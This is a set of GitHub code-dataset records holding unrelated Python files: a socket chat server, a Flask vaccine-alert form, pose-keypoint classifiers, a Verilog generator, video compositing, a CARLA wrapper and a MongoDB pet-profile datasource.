super().__init__()\n self.hparams = args\n self.mean = (0.4914, 0.4822, 0.4465)\n self.std = (0.2471, 0.2435, 0.2616)\n\n def dataloader(self):\n transform = T.Compose(\n [\n T.ToTensor(),\n T.Normalize(self.mean, self.std),\n ]\n )\n dataset = C10IMG(transform=transform,\n 
model_name=self.hparams.model_name,\n data_dir=self.hparams.data_dir)\n dataloader = DataLoader(\n dataset,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n drop_last=True,\n pin_memory=True,\n )\n return dataloader\n","repo_name":"hwsel/ProtectivePerturbation","sub_path":"server/mobile_data.py","file_name":"mobile_data.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
{"seq_id":"18140895640","text":"import socket\nimport threading \nfrom UserManager import UserManager\nimport time\n\nHOST =\"\"\nPORT =9000\nHEADER =64\nFORMAT =\"utf-8\"\nDISCONNECT_MSG =\"[!EXIT]\"\nFILE_HEADER=\"[FILE]\"\nMESSAGE_HEADER=\"[MESG]\"\nbf_size = 65536\n\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver.bind((HOST,PORT))\nuser = UserManager()\n\n\n\ndef runServer():\n print(\"============ Starting chat server. ============\")\n server.listen()\n print(\"[LISTENING] server is listening\")\n while True:\n conn,addr=server.accept()\n client_info = conn.recv(1024).decode()\n username,password=client_info.split('/')\n #### add the user\n case=user.addUser(username,password,conn,addr)\n if case==1:\n conn.sendall(\"환영\".encode())\n thread = threading.Thread(target=handle_client,args=(username,conn,addr))\n thread.daemon=True\n thread.start()\n elif case==2:\n conn.sendall(\"비틀림\".encode())\n elif case==3:\n conn.sendall(\"아중복\".encode())\n elif case==4:\n conn.sendall(\"환영\".encode())\n thread = threading.Thread(target=handle_client,args=(username,conn,addr))\n thread.daemon=True\n thread.start()\n \n \n \n\ndef handle_client(username,conn,addr):\n print(f\"[NEW connection ] {addr} connected\")\n connected = True\n while connected:\n try:\n msg = conn.recv(10).decode(FORMAT)\n if msg ==DISCONNECT_MSG:\n connected=False\n print(f\"[{addr}] {msg}\")\n\n if msg == FILE_HEADER:\n #=================== receive the file header and info ===================\n file_info = conn.recv(bf_size).decode()\n #=================== send file info (server -> all clients) ===================\n user.sendMessageToAll(file_info,2)\n #=================== send the file (server -> all clients) ===================\n fileSize = int(file_info.split(',')[0])\n count=fileSize//bf_size\n if fileSize%bf_size!=0:\n count+=1\n\n for i in range(count):\n data = conn.recv(bf_size)\n user.sendFileToAll(username,data)\n\n # if it is a plain chat message\n if msg == MESSAGE_HEADER:\n msg = conn.recv(1024).decode(FORMAT)\n user.messageHandler(username,msg)\n except Exception as e:\n connected=False\n print(e)\n print('[%s] disconnecting' %username)\n user.removeUser(username)\n\nif __name__ == '__main__':\n runServer()\n \n","repo_name":"player31-kks/socket_gui","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"17933074160","text":"from flask import Flask, render_template, request\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom datetime import datetime, timedelta\n\nfrom util import is_empty\nfrom insert_to_table import insert_user_data_to_db\nfrom check_availability_periodically import check_availability_for_db\n\napp = Flask(__name__)\n\"\"\"\nFlask app instance.\n\"\"\"\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n # On submit, check if the mandatory fields exist or not\n form_data = request.form\n should_error = False\n if is_empty(form_data, 
\"email\"):\n # User hasn't provided Email ID\n # I hate the user, let me show my hatred real quick\n should_error = True\n error_msg = \"No EMAIL ID was provided, cannot schedule alert\"\n if is_empty(form_data, \"age\"):\n # User hasn't provided age\n # Are you kidding me!!!\n should_error = True\n error_msg = \"No age was provided, cannot schedule alert\"\n if is_empty(form_data, \"pincode\"):\n # User hasn't provided pincode\n should_error = True\n error_msg = \"No pincode was provided, cannot schedule alert\"\n if should_error:\n return error_msg, 400\n\n email = form_data.get(\"email\")\n age = int(form_data.get(\"age\"))\n pincode = form_data.get(\"pincode\")\n username = form_data.get(\"username\")\n if not username:\n username = \"user\"\n\n start_date = form_data.get(\"start_date\")\n if not start_date:\n start_date = datetime.today().strftime('%Y-%m-%d')\n\n end_date = form_data.get(\"end_date\")\n\n if not end_date:\n end_date = (datetime.today() + timedelta(days=365)).strftime('%Y-%m-%d')\n\n cvc_type = form_data.get(\"cvc_type\", \"any\")\n if cvc_type not in (\"any\", \"Free\", \"Paid\"):\n should_error = True\n error_msg = \"Hey, please don't play around with the inputs you lil piece of shit\"\n\n vaccine_choice = form_data.get(\"vaccine_choice\", \"any\")\n if vaccine_choice not in (\"any\", \"COVISHIELD\", \"COVAXIN\"):\n should_error = True\n error_msg = \"Hey, please don't play around with the inputs you lil piece of shit\"\n\n pincode_set = set(pincode.split(\";\"))\n if should_error:\n return error_msg, 400\n\n insert_user_data_to_db(email, age, pincode_set, start_date=start_date, end_date=end_date,\n fee_type=cvc_type, vaccine=vaccine_choice)\n\n return render_template(\"alert_success.html\", username=username)\n\n\n\"\"\"\n# Stop running the Scheduled now.\n\nsched = BackgroundScheduler()\nsched.add_job(check_availability_for_db,'cron', minute='*/30')\nsched.start()\n\"\"\"\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"return007/bookmycovidshot","sub_path":"bookmycovidshot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"33472948763","text":"import numpy as np\nfib_list = [1, 2]\nvar_1 = 1\nvar_2 = 2\nsum=0\nwhile True:\n temp = var_1 + var_2\n if temp >= 4000000:\n break\n fib_list.append(temp)\n var_1 = var_2\n var_2 = temp\nfor num in fib_list:\n if num%2 == 0:\n print(num, end=\" \")\n sum = sum + num\nprint()\nprint(sum)","repo_name":"Goku-kun/project-euler","sub_path":"problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35790518261","text":"# Converts a model architecture description along with its weights into verilog. 
\n\nfrom collections import OrderedDict\nimport numpy as np\nimport pickle\nimport re\nimport os\nfrom verilog_converters import getverilog_conv, getverilog_fc, getverilog_maxp, getverilog_pad, finalize\n\ndef cleanup_arch(arch):\n '''Extract relevant components from architecture description'''\n pad_count = 0\n arch = [x for x in arch.split(\"\\n\") if ('Ternary' in x or 'MaxPool' in x)]\n res_arch = []\n for op in arch:\n op_name = re.findall('\\(([a-z0-9]+)\\): ', op)[0]\n op_type = re.findall(': ([A-Za-z0-9]+)\\(', op)[0]\n \n kernel_size = \"\"\n if 'conv' in op_name:\n kernel_size = re.findall('kernel_size=\\(([0-9]+), [0-9]+\\)', op)[0]\n if 'mp' in op_name:\n kernel_size = re.findall('kernel_size=([0-9]+)', op)[0]\n \n if op_type.startswith(\"MaxPool\") and not op_name.startswith(\"mp\"):\n continue\n if 'padding' in op and 'TernaryConv' in op_type:\n res_arch.append((\"pad\" + str(pad_count) + \"_\" + str(int(kernel_size)//2), \"Padding\"))\n pad_count += 1\n if op_name.startswith('mp'):\n res_arch.append((op_name + \"_\" + kernel_size, op_type))\n continue\n\n res_arch.append((op_name, op_type))\n return res_arch\n\n\ndirname = os.path.dirname(__file__)\nweights_file = open(os.path.join(dirname, \"TNN_mini/weights.dat\"), 'rb')\nweights_dict = pickle.load(weights_file)\nweights_file.close()\n\ndirname = os.path.dirname(__file__)\narchitecture = cleanup_arch(open(os.path.join(dirname, \"TNN_mini/model_architecture.dat\")).read())\n\nprint(weights_dict.keys())\nfor op in weights_dict.keys():\n print(weights_dict[op].shape, end=\" \")\n if 'conv' in op:\n print(\"Convolution\")\n elif 'fc' in op:\n print(\"FC\")\nprint()\nprint(architecture)\n\n\ninput_size_lh = 28 # INPUT SIZE LENGTH/WIDTH\ninput_size_d = 1 # INPUT SIZE DEPTH\ncur_input_name = \"g_input\"\ninitializers_all = \"\"\ncounter = 0\ninclude = []\nverilog_code_all =\"\" \ni_lh_orig = input_size_lh\ni_d_orig = input_size_d\n\nfor name, op_type in architecture:\n print(name, op_type)\n if name.startswith(\"conv\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_conv(name, cur_input_name, weights_dict[name], input_size_lh, input_size_d, counter)\n elif name.startswith(\"fc\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_fc(name, cur_input_name, weights_dict[name], input_size_lh, input_size_d, counter)\n elif name.startswith(\"mp\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_maxp(name, cur_input_name, input_size_lh, input_size_d, counter)\n elif name.startswith(\"pad\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_pad(name, cur_input_name, input_size_lh, input_size_d, counter)\n \n initializers_all += initializers\n verilog_code_all += verilog_code\n\ninclude = finalize()\n\ncaller_file_code = \"\"\"\n{includes}\n\nmodule mlnn\n#(\n parameter INPUTSIZE = {inputsize}\n)\n(\n clk,\n rst,\n g_input,\n e_input,\n o\n); \n\ninput clk;\ninput rst;\ninput bit [INPUTSIZE-1:0] g_input;\ninput bit [{weightssize}:0] e_input;\noutput bit [{output_size}:0] o;\n\n{misclogic}\n\n{modulecallslist}\n\nassign o = {last_output_name}; \n\nendmodule\n \"\"\".format(includes=\"\".join(['`include \"' + x + '\"\\n' for x in include]), inputsize=str(i_lh_orig*i_lh_orig*i_d_orig), weightssize=str(counter-1), output_size=str(input_size_lh*input_size_lh*input_size_d-1), misclogic=initializers_all, modulecallslist=verilog_code_all, 
last_output_name=cur_input_name)\n\ndirname = os.path.dirname(__file__)\nf = open(os.path.join(dirname, \"multlayer1.sv\"), \"w+\")\nf.write(caller_file_code)\nf.close()","repo_name":"privacytrustlab/soteria_private_nn_inference","sub_path":"Soteria/Verilog_constructor/convert_verilog.py","file_name":"convert_verilog.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"34730494083","text":"import os\nfrom moviepy.editor import *\n\ntitle = (ImageClip(\"TeX/static_dark_frames_000.png\")\n .set_duration(4)\n .fadeout(1))\n\nintro = [ImageClip(\"TeX/\" + fname).set_duration(8)\n for fname in sorted(os.listdir(\"TeX\"))\n if fname.startswith(\"intro\") and fname.endswith(\".png\")]\nintro[0] = intro[0].fadein(1)\nintro[-1] = intro[-1].fadeout(1)\n\nembedding = [ImageClip(\"TeX/\" + fname).set_duration(8)\n for fname in sorted(os.listdir(\"TeX\"))\n if fname.startswith(\"embedding\") and fname.endswith(\".png\")]\nembedding[0] = embedding[0].fadein(1)\nembedding[-1] = embedding[-1].fadeout(1)\n\nmotion = [ImageClip(\"TeX/\" + fname).set_duration(8)\n for fname in sorted(os.listdir(\"TeX\"))\n if fname.startswith(\"motion\") and fname.endswith(\".png\")]\nmotion[0] = motion[0].fadein(1)\nmotion[-1] = motion[-1].fadeout(1)\n\ntrajectory_movie = VideoFileClip(\"povray/trajectory.avi\")\nembedding_movie = VideoFileClip(\"povray/embedding.avi\")\nmotion_movie = VideoFileClip(\"povray/embedded_motion.avi\")\n\ntrajectory_length = trajectory_movie.duration\nembedding_length = embedding_movie.duration\nmotion_length = motion_movie.duration\n\ntrajectory_insert_1 = (ImageClip(\"TeX/insert_trajectory_1.png\", transparent=True)\n .set_duration(trajectory_length/3)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\ntrajectory_insert_2 = (ImageClip(\"TeX/insert_trajectory_2.png\", transparent=True)\n .set_duration(trajectory_length/3)\n .set_start(trajectory_length/3)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\ntrajectory_insert_3 = (ImageClip(\"TeX/insert_trajectory_3.png\", transparent=True)\n .set_duration(trajectory_length/3)\n .set_start(2*trajectory_length/3)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\n\ntrajectory_comp = CompositeVideoClip([trajectory_movie, trajectory_insert_1,\n trajectory_insert_2, trajectory_insert_3])\n\nembedding_insert_1 = (ImageClip(\"TeX/insert_embedding_1.png\", transparent=True)\n .set_duration(embedding_length/6)\n .set_position((0.15,0.15), relative=True)\n .crossfadeout(.5))\nembedding_insert_2 = (ImageClip(\"TeX/insert_embedding_2.png\", transparent=True)\n .set_duration(2*embedding_length/3)\n .set_start(embedding_length/6)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\nembedding_insert_3 = (ImageClip(\"TeX/insert_embedding_3.png\", transparent=True)\n .set_duration(embedding_length/6)\n .set_start(5*embedding_length/6)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5))\n\nembedding_comp = (CompositeVideoClip([embedding_movie, embedding_insert_1,\n embedding_insert_2, embedding_insert_3])\n )\n\nembedding_first = embedding_comp.to_ImageClip(duration=3)\nembedding_last = embedding_comp.to_ImageClip(t=embedding_length-.1, duration=3)\n\ncomp = concatenate([title] + intro +\n [trajectory_comp] + embedding +\n [embedding_first, embedding_comp, embedding_last] +\n motion + 
[motion_movie])\n\ncomp.write_videofile(\"embedding.mp4\")\n","repo_name":"lahvak/Calc3","sub_path":"embedding/makemovie.py","file_name":"makemovie.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25671816799","text":"import cv2\nimport os\nimport csv\nimport pandas as pd\nimport sklearn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sys import platform\nfrom numpy.lib.arraypad import pad\nfrom enum import Enum\n\nfrom deep_sort.iou_matching import iou_cost\nfrom deep_sort.kalman_filter import KalmanFilter\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker as DeepTracker\nfrom deep_sort import nn_matching\nfrom deep_sort import preprocessing\nfrom deep_sort.linear_assignment import min_cost_matching\nfrom deep_sort.detection import Detection as ddet\nfrom tools import generate_detections as gdet\nfrom tools.utils import poses2boxes\n\n\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM, Embedding, Dropout, BatchNormalization\nfrom keras.utils import to_categorical\nfrom keras.optimizers import SGD\n\nimport autokeras as ak\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\nfrom sklearn.metrics import confusion_matrix,plot_confusion_matrix\nfrom sklearn import preprocessing\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\nfrom src.utiles import plot_confusion_matrix2, split_datos, split_xy\n\n\n\n# Funcion para extraer los keypoints de las diferentes imagenes y almacenarlas en un csv con su respectiva clase\ndef extraer_keypointsTrex(pathImagenes,opWrapper,op,dim,csv_path_x,csv_path_y):\n try:\n print(\"##-------- Extraer Keypoints -------------##\")\n\n classes = os.listdir(pathImagenes)\n print(\"--------- Clases modelo ---------------\")\n print(classes)\n\n # Deep Tracker\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\",1,None)\n model_filename = 'model_data/mars-small128.pb'\n encoder = gdet.create_box_encoder(model_filename,batch_size=1)\n\n key_pointscsv = ['clase','nose_x','nose_y','neck_x','neck_y','Rshoulder_x','Rshoulder_y','Relbow_x','Relbow_y',\t'Rwrist_x','RWrist_y','LShoulder_x','LShoulder_y','LElbow_x','LElbow_y',\n 'LWrist_x','LWrist_y','RHip_x','RHip_y','RKnee_x','RKnee_y','RAnkle_x','RAnkle_y','LHip_x','LHip_y','LKnee_x','LKnee_y','LAnkle_x','LAnkle_y','REye_x','REye_y',\n 'LEye_x','LEye_y','REar_x','REar_y','LEar_x','LEar_y','LBigToe_x','LBigToe_y','LSmallToe_x','LSmallToe_y','Lheel_x','Lheel_y','RBigToe_x','RBigToe_y',\n 'RSmallToe_x','RSmallToe_y','Rheel_x','Rheel_y','Background_X','Background_y'] \n\n with open(csv_path_x, mode='w', newline=\"\") as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',quoting=csv.QUOTE_MINIMAL)\n\n # data_writer.writerow(key_pointscsv)\n \n for clase in classes:\n path = pathImagenes+\"/\"+clase\n if os.path.exists(path):\n imagenes = os.listdir(path)\n for img in imagenes:\n tracker = DeepTracker(metric,max_age=30,n_init=3) #100-20\n datum = op.Datum()\n imageToProcess = cv2.imread(path+\"/\"+img)\n imageToProcess = cv2.resize(imageToProcess, dim, interpolation = cv2.INTER_AREA) # resize image\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop(op.VectorDatum([datum]))\n\n frameOut = datum.cvOutputData\n\n if datum.poseKeypoints is not None:\n\n for people in datum.poseKeypoints:\n lstKeypoints = 
[]\n lstKeypoints.append(clase)\n for keypoints in people:\n lstKeypoints.append(keypoints[0]) #x\n lstKeypoints.append(keypoints[1]) #y\n\n data_writer.writerow(lstKeypoints)\n\n del datum\n except Exception as e:\n print(\"Keypoints ->\"+str(e))\n\n\n# Funcion para crear un modelo lstm en base a los keypoints extraidos de los frames y almacenados en el csv\ndef lstm_trex(csv_path,label_names,steps):\n try:\n print(\"##-------- Modelo LSTM -------------##\")\n\n # Lectura y procesamiento de los datos\n split_xy(csv_path)\n\n X_train,y_train = split_datos('output/data/x_train.csv','output/data/y_train.csv',steps)\n print(X_train.shape)\n print(y_train.shape)\n\n X_test,y_test = split_datos('output/data/x_test.csv','output/data/y_test.csv',steps)\n print(X_test.shape)\n print(y_test.shape)\n\n # Datos configuracion LSTM\n n_input = len(X_train[0][0])\n n_hidden = 50 # Hidden layer num of features\n n_classes = len(label_names) #number of action classes\n batch_size = 32\n epochs = 2\n\n # y_train_one_hot = to_categorical(y_train, num_classes=n_classes)\n # y_test_one_hot = to_categorical(y_test, n_classes)\n\n train_size = X_train.shape[0] - X_train.shape[0] % batch_size\n test_size = X_test.shape[0] - X_test.shape[0] % batch_size\n \n model = Sequential([\n # relu activation\n Dense(n_hidden, activation='relu'),\n BatchNormalization(), \n LSTM(n_hidden, return_sequences=True, unit_forget_bias=1.0,dropout=0.2),\n LSTM(n_hidden, unit_forget_bias=1.0),\n BatchNormalization(), \n Dense(n_classes,activation='softmax')\n ])\n\n model.compile(loss='categorical_crossentropy', optimizer=SGD(), metrics=['accuracy'])\n\n history = model.fit(\n X_train[:train_size,:,:], \n y_train[:train_size,:], \n epochs=1,\n batch_size=batch_size\n )\n\n # Configuracion modelo LSTM\n model = Sequential()\n model.add(Embedding(5000, 50, input_length=X_train.shape[1]))\n model.add(Dropout(0.3))\n model.add(LSTM(50, return_sequences=True, dropout=0.3, recurrent_dropout=0.2))\n model.add(LSTM(50, dropout=0.3, recurrent_dropout=0.2))\n model.add(Dense(7, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.summary() \n\n model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size, verbose=1)\n\n # Guardar modelo\n # model.save('output/model/sentiment_analysis-trexNorm.h5')\n\n # Test modelo\n # predictions = model.predict(X_test)\n # print(predictions.shape)\n # print(predictions)\n # # Matriz de confusion \n # cm = confusion_matrix(np.argmax(y_train,axis=1), np.argmax(predictions,axis=1))\n # plot_confusion_matrix2(cm, classes=np.asarray(label_names), normalize=True,\n # title='Normalized confusion matrix LSTM') \n # plt.show()\n\n except Exception as e:\n print(\"LSTM Model->\"+str(e))\n\ndef lstmanalisys_trex(csv_path,label_names):\n try:\n print(\"##-------- Modelo LSTM -------------##\")\n \n # Lectura y procesamiento de los datos\n data = pd.read_csv(csv_path)\n data = data.sample(frac=1).reset_index(drop=True)\n cols = data.columns.drop('clase')\n data[cols] = data[cols].apply(pd.to_numeric, errors='coerce')\n print(data.shape)\n print(data.head())\n y_classes = data['clase']\n\n dataKeypoints = data.iloc[0:,1:]\n print(dataKeypoints.head())\n print(dataKeypoints.info())\n\n X = dataKeypoints.to_numpy()\n print(\"--- Dimension y muestra X ---\")\n print(X.shape)\n print(X[:5])\n \n y = pd.get_dummies(data['clase']).values\n print(\"--- Dimension y muestra Y ---\")\n print(y.shape)\n print(y[:9])\n\n # Mapping de las clases\n encoder = 
LabelEncoder()\n encoder_Y = encoder.fit_transform(y_classes)\n class_mapping = dict(zip(encoder.classes_, encoder.transform(encoder.classes_)))\n print(class_mapping)\n\n # Configuracion modelo LSTM\n model = Sequential()\n model.add(Embedding(5000, 256, input_length=X.shape[1]))\n model.add(Dropout(0.3))\n model.add(LSTM(256, return_sequences=True, dropout=0.3, recurrent_dropout=0.2))\n model.add(LSTM(256, dropout=0.3, recurrent_dropout=0.2))\n model.add(Dense(8, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.summary()\n\n # Division de datos\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n batch_size = 32\n epochs = 8\n\n model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size, verbose=1)\n\n model.save('output/model/sentiment_analysis-trex.h5')\n\n # Testing model\n predictions = model.predict(X_test)\n\n # Matriz de confusion\n cm = confusion_matrix(np.argmax(y_test,axis=1), np.argmax(predictions,axis=1))\n plot_confusion_matrix2(cm, classes=np.asarray(label_names), normalize=True,\n title='Normalized confusion matrix') \n plt.show()\n except Exception as e:\n print(\"LSTM ->\"+str(e))\n# Funcion para realizar el entrenamiento de un modelo KNN\ndef knn_trex(csv_path,label_names):\n try:\n print(\"##-------- Modelo KNN -------------##\")\n\n # Lectura y procesamiento de los datos\n data = pd.read_csv(csv_path,header=None)\n data = data.sample(frac=1).reset_index(drop=True)\n cols = data.columns.drop(0)\n data[cols] = data[cols].apply(pd.to_numeric, errors='coerce')\n data = data.dropna()\n print(\"--- Dimension y muestra datos ---\")\n print(data.shape)\n print(data.head())\n\n dataKeypoints = data.iloc[0:,1:]\n\n X = dataKeypoints.to_numpy()\n print(\"--- Dimension y muestra X ---\")\n print(X.shape)\n print(X[:5])\n\n # Normalizar datos MinMax\n norm = MinMaxScaler().fit(X)\n X_norm = norm.transform(X)\n print(\"--- Dimension y muestra X normalizada ---\")\n print(X_norm.shape)\n print(X_norm[:2])\n\n # y = pd.get_dummies(data[0]).values\n y = data[0].values\n # [print(data[0][i], y[i]) for i in range(0,5)]\n print(\"--- Dimension y muestra Y ---\")\n print(y.shape)\n print(y[:5])\n\n # Division de los datos\n X_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size=0.2, random_state=0)\n \n # Modelo KNN con el numero de clases\n model = KNeighborsClassifier(n_neighbors=7)\n model.fit(X_train, y_train)\n\n y_pred = model.predict(X_test)\n print(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n\n # Matriz de confusion\n plot_confusion_matrix(model, X_test, y_test, normalize='true') \n plt.title(\"Matriz Confusion - k=7\")\n plt.show()\n \n # Prueba de KNN con un rango de K\n k_range = range(1,26)\n scores = {}\n scores_list = []\n for k in k_range:\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train, y_train)\n y_pred = knn.predict(X_test)\n scores[k]=metrics.accuracy_score(y_test, y_pred)\n scores_list.append(metrics.accuracy_score(y_test, y_pred))\n\n plt.plot(k_range,scores_list)\n plt.xlabel(\"Valor de K\")\n plt.ylabel(\"Accuracy\")\n\n plt.show()\n except Exception as e:\n print(\"KNN Model->\"+str(e))\n\n# Funcion para realizar un modelo mediante el algoritmo de automl de AutoKeras\ndef automl_trex(csv_path,label_names):\n try:\n print(\"##-------- Modelo AutoML -------------##\")\n\n # Lectura y procesamiento de los datos\n df = pd.read_csv(csv_path, header=0)\n dataset = df.values\n\n X = dataset[:, 
1:51].astype(float)\n Y = dataset[:, 0]\n print(\"--- Dimension X-Y ---\")\n print(X.shape)\n print(Y.shape)\n\n # Normalizar datos MinMax\n norm = MinMaxScaler().fit(X)\n X_norm = norm.transform(X)\n print(\"--- Dimension y muestra X normalizada MinMax ---\")\n print(X_norm.shape)\n print(X_norm[:5])\n\n # Mapping de las clases\n encoder = LabelEncoder()\n encoder_Y = encoder.fit_transform(Y)\n class_mapping = dict(zip(encoder.classes_, encoder.transform(encoder.classes_)))\n print(\"--- Mapeo clases ---\")\n print(class_mapping)\n\n # Division de los datos\n X_train, X_test, Y_train, Y_test = train_test_split(X_norm, encoder_Y, test_size=0.2, random_state=0)\n\n # Configuracion modelo AutoKeras\n clf3 = ak.StructuredDataClassifier(max_trials=1)\n clf3.fit(x=X_train, y=Y_train, epochs=50)\n\n # Test modelo\n y_pred_autok3 = clf3.predict(X_test)\n accuracy_autok3_df = metrics.accuracy_score(Y_test, y_pred_autok3)\n\n # Evaluar modelo\n print(\"Accuracy Evaluate: {accuracy}\".format(accuracy=clf3.evaluate(X_test, Y_test)))\n\n # Matriz de confusion \n cm = confusion_matrix(np.argmax(Y_train,axis=1), np.argmax(y_pred_autok3,axis=1))\n plot_confusion_matrix2(cm, classes=np.asarray(label_names), normalize=True,\n title='Normalized confusion matrix AUTOML') \n plt.show()\n\n # Obtener mejor modelo \n best_model = clf3.tuner.get_best_model()\n\n # Guardar modelo\n try:\n best_model.save(\"output/model/automl_sentiment-trex.h5\")\n except Exception as e:\n print(\"Save AutoML->\"+str(e))\n\n del clf3\n except Exception as e:\n print(\"AutoML Model->\"+str(e))","repo_name":"japicazosuni/TFG_HAR","sub_path":"secuencia-videos/src/trex.py","file_name":"trex.py","file_ext":"py","file_size_in_byte":13730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69969710840","text":"import carla\nfrom carla_birdeye_view import BirdViewProducer, BirdViewCropType, PixelDimensions\n\nclass BirdEyeView:\n\n def __init__(self):\n client = carla.Client('localhost', 2000)\n client.set_timeout(10.0)\n self.birdview_producer = BirdViewProducer(\n client, # carla.Client\n target_size=PixelDimensions(width=100, height=300),\n pixels_per_meter=10,\n render_lanes_on_junctions=True,\n crop_type=BirdViewCropType.FRONT_AREA_ONLY\n )\n\n def getImage(self, vehicle):\n try:\n birdview = self.birdview_producer.produce(\n agent_vehicle=vehicle # carla.Actor (spawned vehicle)\n )\n except Exception as ex:\n print(ex)\n # Mask to RGB image\n image = BirdViewProducer.as_rgb(birdview)\n return image\n","repo_name":"JdeRobot/BehaviorMetrics","sub_path":"behavior_metrics/robot/interfaces/birdeyeview.py","file_name":"birdeyeview.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"40"} +{"seq_id":"33542700304","text":"from subprocess import run, PIPE\nimport sys\nimport time\n\n# usage: python3 run.py sorting_and_searching/distinct_numbers test_input.txt\n\nprogram = sys.argv[1]\ninput = sys.argv[2]\n\nwith open(input, \"r\") as fp:\n input_str = fp.read()\n\nt = time.time()\np = run([program], stdout=PIPE, input=input_str, encoding='ascii')\nelapsed = time.time()-t\nprint(p.returncode)\nprint(p.stdout)\n\nprint(f\"Time: {elapsed:.6f}\")","repo_name":"alenic/comprosol","sub_path":"CSES/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33943098798","text":"import 
sys\nfrom pymongo.results import InsertOneResult, DeleteResult, UpdateResult\nfrom dataclasses import asdict\n\nsys.path.append(\".\")\nfrom databases.mongodb import MongoDatabase\nfrom lib.core.data.pet_profile.models.pet_profile import PetProfileModel\n\n\nclass PetProfileLocalDatasource:\n \n def __init__(self):\n self.db = MongoDatabase()\n\n\n def get_pet_profile(self, userId: int) -> (PetProfileModel | None):\n query_pet: dict = {\"userId\": userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n if pet_exists:\n pet_profile_dict: dict = self.db.find_table(query_pet)\n pet_profile_dict.pop(\"_id\")\n pet_profile = PetProfileModel(**pet_profile_dict)\n return pet_profile\n \n else: \n return None\n \n \n def delete_pet_profile(self, userId: int) -> (DeleteResult | None):\n query_pet: dict = {\"userId\": userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n if pet_exists:\n delete_pet_profile = self.db.delete_tables(query_pet)\n return delete_pet_profile\n \n else: \n return None\n \n \n def insert_pet_profile(self, profile: PetProfileModel) -> (InsertOneResult | None):\n query_pet: dict = {\"userId\": profile.userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n \n if pet_exists:\n return None\n \n else: \n dict_profile = asdict(profile)\n print(dict_profile)\n upload = self.db.upload_table(dict_profile)\n \n return upload\n \n \n def update_pet_profile(self, profile: PetProfileModel) -> (UpdateResult | None):\n query_pet: dict = {\"userId\": profile.userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n \n if pet_exists: # only an existing profile can be updated\n query = {\"userId\": profile.userId}\n dict_profile = asdict(profile)\n upload = self.db.update_table(query, dict_profile)\n return upload\n \n else: \n return None","repo_name":"JustZet/Grow-a-pet","sub_path":"lib/core/data/pet_profile/datasources/local_profiles.py","file_name":"local_profiles.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"17713807027","text":"import os\nimport re\nfrom functools import partial\n\nimport pandas as pd\nimport matplotlib\n\nfrom .genes import RNASeqError\nfrom .plotting import plot_outs_per_id\nfrom .utils import applyParallel\n\nmatplotlib.use('Agg')\n\nimport statsmodels.api as sm\n\n\n\"\"\"statsmodels/compat/pandas.py:56:\nFutureWarning: The pandas.core.datetools module is deprecated and will be\nremoved in a future version. 
